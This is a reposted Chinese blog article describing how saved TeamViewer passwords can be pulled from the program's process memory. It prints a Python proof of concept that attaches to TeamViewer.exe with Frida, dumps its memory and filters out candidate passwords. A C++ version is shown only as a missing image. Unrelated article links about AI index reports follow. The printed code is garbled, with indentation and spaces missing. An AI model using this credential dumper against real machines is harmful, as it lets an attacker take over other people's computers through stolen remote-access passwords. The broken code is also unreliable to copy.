从TeamViewer的运行内存中提取密码

最新推荐文章于 2025-04-15 13:48:54 发布
最新推荐文章于 2025-04-15 13:48:54 发布
阅读量1w 收藏 4
点赞数 2
分类专栏: 编程心得 技术文章 源码 文章标签: TeamViewer 运行内存 提取密码

http://www.toutiao.com/a6450771078498763021/?tt_from=mobile_qq&utm_campaig

n=client_share&app=news_article&utm_source=mobile_qq&iid=13287414181&utm_medium=toutiao_android


从TeamViewer的运行内存中提取密码

hanz的碎碎念  2017-08-05 21:00

TeamViewer是一款远程连接神器,相信众多的IT运营者对他不陌生。只要知道目标电脑的TeamViewer ID和密码,就可以远程连接到该台电脑。该软件的功能有点像Windows自带的远程桌面,但是远比远程桌面来的强大,特别是你的目标连接设备处于内网的情况下,TeamViewer也能轻而易举地连接上。

最近,有人写了两段小程序,顺利地从TeamViewer运行的内存中获取到了TeamViewer的密码。事情的起因是这样的:他在自己的windows上操作远程VPS主机的时候发现,只要第一次输入了远程电脑的TeamViewer密码之后。下次打开TeamViewer再次连接该主机时,密码会自动填充。好奇心来的太快就像龙卷风,他想:那这密码肯定存储在了电脑中了,可以通过某种手段将它取出来。:

从TeamViewer的运行内存中提取密码

于是折腾开始了,扫描TeamViewer的运行运存发现如下:

从TeamViewer的运行内存中提取密码

通过比对自己的TeamViewer密码,发现该密码是以Unicode的形式存储在内存中。如上图,天蓝色区域的字节为密码部分,第一个红色为起始标记数据,第二个红色为结束的标记数据,有些时候结束的标记数据可能是( 00 00 00 20 00 00)。

为了使用代码提取出密码,这位大牛写了两个程序:Python版本和C++版本。

首先通过使用Frida库,将python脚本附加到TeamViewer.exe进程,获取该进程下每个库的地址和内存大小,然后开始搜索开始为[00 88]字节到结束为[00 00 00]字节这一段中间的内容,然后再将他们根据密码规则和要求解码出来。

从TeamViewer的运行内存中提取密码

C++版本运行后,你可以得到密码"asdQWE123"。

从TeamViewer的运行内存中提取密码

其中python文件TV_POC.py代码如下

import frida

import re

PERMS='rw-'

process ="TeamViewer.exe"

session = frida.attach(process)

print"Attached to process."

mems=session.enumerate_ranges(PERMS)

data_dump=[]

print"Check %s libs."%(len(mems))

for mem in mems:

dump =session.read_bytes(mem.base_address, mem.size)

beg=chr(int('00',16))+chr(int('88',16))

end=chr(int('00',16))+chr(int('00',16))+chr(int('00',16))

for i in dump.split(beg):

if i.find(end)>0and i.index(end)<=33:

data = i[:(i.index(end)+6)]

data_dump.append(data)

session.detach()

print"Cleaning..."

mag_dump_mask_1=[]

mag_dump_mask_2=[]

for i in data_dump:

try:

if i.endswith(chr(int('20',16))+chr(int('00',16))+chr(int('00',16))):

i=i[:len(i)-5]

fnd = re.findall('[0-9a-f]{2}00',i.encode('hex'))

if fnd:

iflen(fnd)==len(i)/2:

mag_data=unicode(i.replace(chr(int('00',16)),""))

regx=ur'^[a-zA-Z0-9!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~]*$'

if re.compile(regx,re.U).match(mag_data) andlen(mag_data)>=4andnot re.match(".*.[w]{2,4}$",mag_data):

mag_dump_mask_1.append(mag_data)

else:

i=i[:len(i)-5]

fnd = re.findall('[0-9a-f]{2}00',i.encode('hex'))

if fnd:

iflen(fnd)==len(i)/2:

mag_data=unicode(i.replace(chr(int('00',16)),""))

regx=ur'^[a-zA-Z0-9!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~]*$'

if re.compile(regx,re.U).match(mag_data) andlen(mag_data)>=4andnot re.match(".*.[w]{2,4}$",mag_data):

mag_dump_mask_2.append(mag_data)

except:

pass

iflen(mag_dump_mask_1)>0:

print"Potential values:"

for i in mag_dump_mask_1:

print i

else:

ind =len(mag_dump_mask_2)

for i in mag_dump_mask_2:

if re.match("^[0-9]*$",i) and mag_dump_mask_2.count(i)>=2:

if mag_dump_mask_2.index(i)<ind:

ind = mag_dump_mask_2.index(i)

print"Possible values: "

for i in mag_dump_mask_2[ind:]:

if mag_dump_mask_2[ind:].count(i) ==1:

print i

C++文件main.cpp代码如下:

从TeamViewer的运行内存中提取密码


大模型笔记』斯坦福HAI发布2024人工智能指数报告
AI新视界
04-16 244
斯坦福HAI发布2024人工智能指数报告
2021人工智能指数报告(中文版).pdf
09-11
2021人工智能指数报告(中文版).pdf
斯坦福大学发布《2025人工智能指数报告
最新发布
2401_84204207的博客
04-15 1758
4月8日,斯坦福李飞飞团队发布第8版人工智能指数报告(2025)。2025 的这份指数报告是“迄今为止内容最为全面的一版”,并且发布人工智能在社会、经济以及全球治理等各个领域的影响力正持续增强的重要时刻。今报告的新内容包括对不断演变的人工智能硬件格局的深入分析、对推理成本的全新估算,以及对人工智能领域学术发表和专利申请趋势的新分析。报告还引入了有关企业采用负责任的人工智能实践的新数据,同时更加关注了对人工智能在科学和医学领域的作用。
2024人工智能指数报告斯坦福大学
2401_84494441的博客
03-04 1160
*2024人工智能指数报告——**来源:Stanford University for Human-Centered Artificial Intelligence2024人工智能指数报告》第七版是该系列迄今为止最为全面的版本,今报告扩大了研究范围,更广泛地覆盖了人工智能领域的一些关键趋势,例如人工智能的技术进步、公众对这项技术的看法,以及围绕其发展的地缘政治动态。本版报告包含了更多的原始数据,介绍了关于人工智能训练成本的新估算,以及一个全新的章节,专门探讨人工智能对科学和医学的影响。
502页 | 2024人工智能指数报告-英文版(免费下载
关注博文底部公众号,发送标题关键字获取文档。
05-08 466
知识星球,获取上万份PPT解决方案!【3】获取本方案PDF下载链接,直接下载即可。如需下载本方案PPT原格式,请加入微信扫描以下。本公众号,转发当前文章到。
人工智能 2021指数报告1
asd1234bbbb的博客
03-04 517
介绍2021人工智能指数报告 欢迎来到第四版人工智能指数报告!今,我们大大扩展了报告中可用的数据量,与更广泛的外部组织合作来校准我们的数据,并加深了我们与斯坦福大学人类研究所的联系 以人工智能(HAI)为中心。 人工智能指数报告对与人工智能相关的数据进行跟踪、整理、提炼和可视化。它的使命是为政策制定者、研究人员、高管、记者和公众提供公正、严格审查和全球来源的数据,以发展对人工智能复杂领域的直觉。该报告旨在成为全球最可信、最权威的人工智能数据和见解来源。 COVID和人工智能 2021报告从多个
斯坦福:2018人工智能AI指数报告
12-16
斯坦福大学发起的人工智能指数(AI Index)是一个追踪 AI 动态和进展的非营利性项目,旨在全面研究 AI 行业状况,目标是促进基于数据的 AI 的广泛交流和有效对话。昨天,AI Index 发出了 2018 报告。本文仅对其进行概要介绍。 这份报告试图从学术、工业、政策等角度全面介绍全球人工智能的发展现状,今报告更加注重全球数据。报告指出,美国的 AI 研究力量仍是全球最强,但中国的追赶速度很快。报告特别介绍了清华大学学习 AI 课程的学生数量:2017 人工智能+机器学习课程的入学人数比 2010 时多 16 倍。 我们很高兴推出 AI Index 2018 报告。本度的报告要实现两个目标:更新上一的指标以及尽可能地提供全球性的背景。前一个目标是 AI Index 至关重要的使命——为探讨人工智能设定基础,即意味着要持续不断地跟踪规模和技术的进展。但后一个目标也很重要。没有全球化的视野,不可能讲好 AI 故事。2017 报告严重偏向了北美地区的活动。这只是因为我们的全球合作关系还有限,并不是因为我们有内在的偏见。今,我们开始填补这一全球性漏洞。我们认识到,要使本报告真正完备全面,前方还有很长的路要走——会涉及到更多合作和外部参与。 尽管如此,我们仍可以断言 AI 是全球性的。2017 ,Scopus 上 83% 的 AI 论文都来自美国之外。其中来自欧洲的占到了最大的比例(28%)。在全世界范围内,AI 和机器学习(ML)大学课程的入学人数都在增多,尤其值得一提的是中国的清华大学,该校 2017 人工智能+机器学习组合课程的入学人数比 2010 时多 16 倍。2017 ,中国生产的工业机器人的数量也占到了世界的最大比重——占全球机器人总出货量的 30%。而且不只是美国、中国和欧洲,其它地方也在推进 AI 的发展。根据我们的统计 AI 专利的方法,韩国和日本在 2014 产出的 AI 专利分列全球第二和第三,仅次于美国。另外,南非成功举办了第二届 Deep Learning Indaba 大会,这是世界最大型的机器学习教学活动之一,吸引了来自 20 多个非洲国家的超过 500 名参会者。 AI 的多样性不仅体现在地理上。如今,Partnership on AI 已有大约 50% 的成员组织是非营利性的,包括美国公民自由联盟、国际特赦组织、牛津大学人类未来研究所和联合国开发计划署。而且人们也对 AI 领域中的性别和少数族裔多样性的重要性有了更高的认识。AI4ALL 和 Women in Machine Learning(WiML)等组织正在加大力度鼓励和支持代表性不足的群体参与进来。
2024 人工智能指数报告》(Artificial Intelligence Index Report 2024
04-24
由李飞飞联合领导的斯坦福大学以人为本人工智能研究所(Stanford HAI发布了《2024 人工智能指数报告》(Artificial Intelligence Index Report 2024)。 这份长达 300 多页的报告是 Stanford HAI 发布的第 7 份...
HAI-2024斯坦福AI指数报告(中文译版).pdf
04-24
### HAI-2024斯坦福AI指数报告(中文译版).pdf #### 关键知识点概述: 1. **报告背景与目的**: - 斯坦福大学“以人为本”人工智能研究院(HAI发布了第7个AI Index报告。 - 报告旨在跟踪、整理、提炼和...
斯坦福大学2024人工智能AI指数报告
04-17
Artificial Intelligence Index Report 2024 斯坦福大学2024人工智能AI指数报告
斯坦福大学发布 2019 人工智能指数报告
寒冰屋的专栏
12-16 437
近日,斯坦福大学人工智能研究所发布了2019 AI 指数报告。该报告涵盖范围较广,以下是一些从报告中提取的主要部分: 对人工智能的研究越来越多,在 1998 至 2018 之间,经过同行评审的 AI 论文数量增长了 300% 以上。 中国现在每出版的 AI 期刊和会议论文数量与欧洲一样多,也超过了美国。不过,美国出版物的“加权引文影响”仍比中国出版物高 50%。 参加 AI 会...
2024人工智能指数报告.zip
05-11
2024人工智能指数报告
刚刚,李飞飞团队发布2024人工智能指数报告》:10大趋势,揭示AI大模型的“喜”与“忧”...
人工智能学家
04-16 265
刚刚,由李飞飞联合领导的斯坦福大学以人为本人工智能研究所(Stanford HAI发布了《2024 人工智能指数报告》(Artificial Intelligence Index Report 2024)。这份长达 300 多页的报告是 Stanford HAI 发布的第 7 份 AI Index 研究,追踪了 2023 全球人工智能的发展趋势。Stanford HAI 官方介绍道,“这是我...
2024人工智能指数报告(503页)
04-18 539
斯坦福大学发布了《2024 人工智能指数报告》,这份报告长达 500 页,是斯坦福大学迄今为止最全面的报告斯坦福大学扩大了其研究范围,这份报告广泛地涵盖了人工智能的技术进步、公众对该技术的看法以及围绕其发展的地缘政治动态等基本趋势。关注公众号:【互联互通社区】,回复【AI298】获取全部报告内容。人工智能关注互联互通社区公众号,回复以下编号,可快速下载相关专题报告合辑。AI001:人工智能核心...
2024人工智能指数报告解析
百态老人的博客
11-01 666
2024人工智能指数报告》是由斯坦福大学人工智能研究所(Stanford HAI发布的第七版报告,于20244月发布。这份报告长达500多页,是目前最全面且权威的AI领域数据洞察报告,旨在全面追踪人工智能最新发展状态和趋势。报告涵盖了多个重要方面,包括技术进展、公共认知、地缘政治动态等。它提供了关于人工智能在不同任务上的表现、产业界主导研究的情况以及AI模型开发成本的详细分析。此外,报告还深入探讨了人工智能在医疗、教育、安全等领域的应用,并强调了人工智能与人类社会的互动关系。
2023斯坦福大学研究所发布人工智能指数 - 从14张图看未来
weixin_45278215的博客
08-04 1032
AI指数斯坦福大学以人为本的人工智能研究所(HAI)的一项独立倡议,由AI指数指导委员会领导,该委员会是一个来自学术界和工业界的跨学科专家小组。它跟踪、整理、提取和可视化与人工智能相关的数据,使决策者能够采取有意义的行动,以负责任和合乎道德的方式推进人工智能的发展。 斯坦福大学人工智能研究所从商业技术和商业伦理的角度,发现了哪些问题,提出了哪些观点,非常值得我们思考和学习及借鉴。
2024 人工智能指数报告 —— 由斯坦福大学人工智能研究院发布
十年互联网开发老兵,陪你一起学技术
04-17 1350
欢迎来到 2024 人工智能指数报告欢迎来到人工智能指数报告的第七版。2024 指数是我们迄今为止最全面的一次,它出现在一个重要的时刻,当 AI 对社会的影响从未如此明显。今,我们扩大了范围,更广泛地覆盖了诸如 AI 技术进步、公众对技术的看法以及围绕其发展的地缘政治动态等基本趋势。这一版包含了比以往任何时候都多的原始数据,引入了关于 AI 培训成本的新估计、负责任的 AI 领域的详细分析...
国外十大高校人工智能实验室及其代表性人物一览
jiandanjinxin的专栏
06-06 3248
本文转自: http://toutiao.com/a6293031494186107137/?tt_from=mobile_qq&utm_campaign=client_share&app=news_article&utm_source=mobile_qq&iid=4325464459&utm_medium=toutiao_android 高校建立的实验室与大公司有所不同,
2021斯坦福大学人工智能指数报告:深度解析AI影响与发展趋势
"【2021】人工智能指数2021(中文版)-斯坦福大学_222页.pdf" 是斯坦福大学以人为本人工智能研究院(HAI发布报告,详细追踪、整理并分析了人工智能领域的最新发展趋势。 报告的核心内容包括以下几个方面: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值